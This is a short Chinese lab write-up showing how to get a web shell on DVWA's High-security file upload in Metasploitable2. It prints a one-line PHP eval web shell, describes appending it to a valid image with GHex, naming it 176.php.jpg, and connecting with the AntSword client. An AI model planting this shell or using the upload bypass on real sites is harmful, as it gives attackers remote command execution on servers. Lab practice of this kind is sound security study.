本文使用metasploitable2进行演示
本文内容仅供交流学习使用,禁止用于不法用途!!!
一句话木马
1
<?php @eval($_POST['176']) ?>
将代码传入php-cgi即可达到我们执行shell命令的目的
上传代码
对于安全级别为High的DVMA来说,其包含的上传图片功能,我们单纯通过修改文件后缀名、PureSuite改变文件类型是无法做到的,还要保证符合文件特征

文件不合规范会提示以下信息:

我们通常得进行数据包含!
在一张正常的图片中,追加一段php代码,此处我们使用GHex。

然后改名为176.php.jpg即可上传上去。
最后打开中国蚁剑,输入地址:http://xxx.xxx.xxx.xxx/hackable/uploads/176.php.jpg,密码:176即可拿到webshell,可以访问所有目录文件夹。渗透成功。

PS: 在我的
Metasploitable2中,其他教程中提到的截%00、../fi/?page=file:///var/www/dvwa/hackable/uploads/xxx好像都没用emm截取0尝试(失败):
访问网址:
File not found.
